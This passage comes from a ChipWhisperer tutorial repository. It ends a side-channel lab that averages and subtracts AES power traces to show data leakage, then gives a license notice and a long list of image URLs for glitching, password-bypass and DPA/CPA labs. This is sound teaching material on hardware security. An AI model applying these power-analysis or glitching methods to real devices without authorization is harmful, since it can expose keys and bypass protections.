Whether we sent 0xFF or 0x00 was 249 | random, so these lists likely won’t be evenly dispersed. Next, we’ll 250 | want to take an average of each group (make sure you take an average of 251 | each trace at each point! We don’t want an average of the traces in 252 | time), which will help smooth out any outliers and also fix our issue of 253 | having a different number of traces for each group: 254 | 255 | 256 | **In [5]:** 257 | 258 | .. code:: ipython3 259 | 260 | # ################### 261 | # Add your code here 262 | # ################### 263 | #raise NotImplementedError("Add Your Code Here") 264 | 265 | # ################### 266 | # START SOLUTION 267 | # ################### 268 | one_avg = np.mean(one_list, axis=0) 269 | zero_avg = np.mean(zero_list, axis=0) 270 | # ################### 271 | # END SOLUTION 272 | # ################### 273 | 274 | Finally, subtract the two averages and plot the resulting data: 275 | 276 | 277 | **In [6]:** 278 | 279 | .. code:: ipython3 280 | 281 | # ################### 282 | # Add your code here 283 | # ################### 284 | #raise NotImplementedError("Add Your Code Here") 285 | 286 | # ################### 287 | # START SOLUTION 288 | # ################### 289 | %matplotlib inline 290 | import matplotlib.pyplot as plt 291 | 292 | diff = one_avg - zero_avg 293 | 294 | plt.plot(diff) 295 | plt.show() 296 | # ################### 297 | # END SOLUTION 298 | # ################### 299 | 300 | 301 | **Out [6]:** 302 | 303 | 304 | .. image:: img/OPENADC-CWLITEXMEGA-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png 305 | 306 | 307 | You should see a very distinct trace near the beginning of the plot, 308 | meaning that the data being manipulated in the target device is visible 309 | in its power trace! Again, there’s a lot of room to explore here: 310 | 311 | - Try setting multiple bytes to 0x00 and 0xFF. 312 | - Try using smaller hamming weight differences. Is the spike still 313 | distinct? What about if you capture more traces? 314 | - We focused on the first byte here. Try putting the difference plots 315 | for multiple different bytes on the same plot. 316 | - The target is running AES here. Can you get the spikes to appear in 317 | different places if you set a byte in a later round of AES (say round 318 | 5) to 0x00 or 0xFF? 319 | 320 | -------------- 321 | 322 | NO-FUN DISCLAIMER: This material is Copyright (C) NewAE Technology Inc., 323 | 2015-2020. ChipWhisperer is a trademark of NewAE Technology Inc., 324 | claimed in all jurisdictions, and registered in at least the United 325 | States of America, European Union, and Peoples Republic of China. 326 | 327 | Tutorials derived from our open-source work must be released under the 328 | associated open-source license, and notice of the source must be 329 | *clearly displayed*. Only original copyright holders may license or 330 | authorize other distribution - while NewAE Technology Inc. holds the 331 | copyright for many tutorials, the github repository includes community 332 | contributions which we cannot license under special terms and **must** 333 | be maintained as an open-source release. Please contact us for special 334 | permissions (where possible). 335 | 336 | THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS 337 | OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 338 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 339 | IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY 340 | CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, 341 | TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 342 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 343 | -------------------------------------------------------------------------------- /img/4traces_aes_clkx1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/4traces_aes_clkx1.png -------------------------------------------------------------------------------- /img/4traces_aes_clkx1_offset60000.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/4traces_aes_clkx1_offset60000.png -------------------------------------------------------------------------------- /img/4traces_aes_clkx1_presample5000.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/4traces_aes_clkx1_presample5000.png -------------------------------------------------------------------------------- /img/4traces_aes_clkx1_presample5000_zoom.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/4traces_aes_clkx1_presample5000_zoom.png -------------------------------------------------------------------------------- /img/4traces_aes_clkx4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/4traces_aes_clkx4.png -------------------------------------------------------------------------------- /img/4traces_aes_poortrigger.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/4traces_aes_poortrigger.png -------------------------------------------------------------------------------- /img/A9_LPC1114_CHANGES.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/A9_LPC1114_CHANGES.jpg -------------------------------------------------------------------------------- /img/A9_LPC_CWLITE_Conn.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/A9_LPC_CWLITE_Conn.jpg -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_fault101_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_14_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_1B-IntroductiontoVoltageGlitchingwithCWNano_15_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_fault101_SOLN_Fault2_2B-VoltageGlitchingwithCWNanotoBypassPassword_12_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_14_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_14_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_16_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_16_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_36_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_36_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_47_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_47_1.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_49_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_49_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_51_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_51_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png -------------------------------------------------------------------------------- /img/CWNANO-CWNANO-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/CWNANO-CWNANO-courses_sca101_SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png -------------------------------------------------------------------------------- /img/GoodVBadRef.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/GoodVBadRef.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_32_10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_32_10.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_32_12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_32_12.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_15.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_19.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab4_1-PowerandHammingWeightRelationship_5_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-SOLN_Lab4_2-CPAonFirmwareImplementationofAES_10_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_20_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_32_14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_32_14.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_1-IntroductiontoClockGlitching_34_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_12_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_20_6.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_3.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_4.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault1_3-ClockGlitchingtoMemoryDump_22_5.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_fault101_SOLN_Fault2_1-IntroductiontoVoltageGlitching_14_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_13_2.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_16_3.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_20_2.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab2_1B-PowerAnalysisforPasswordBypass_22_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_1-LargeHammingWeightSwings_13_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_24_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_2-RecoveringDatafromaSingleBit_50_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_16_0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_16_0.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_36_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_36_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_47_1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/newaetech/chipwhisperer-tutorials/02c9742e412d0889c9da7240eeb9575491e0e9ac/img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_47_1.png -------------------------------------------------------------------------------- /img/OPENADC-CWLITEARM-courses_sca101_SOLN_Lab3_3-DPAonFirmwareImplementationofAES_49_0.png: 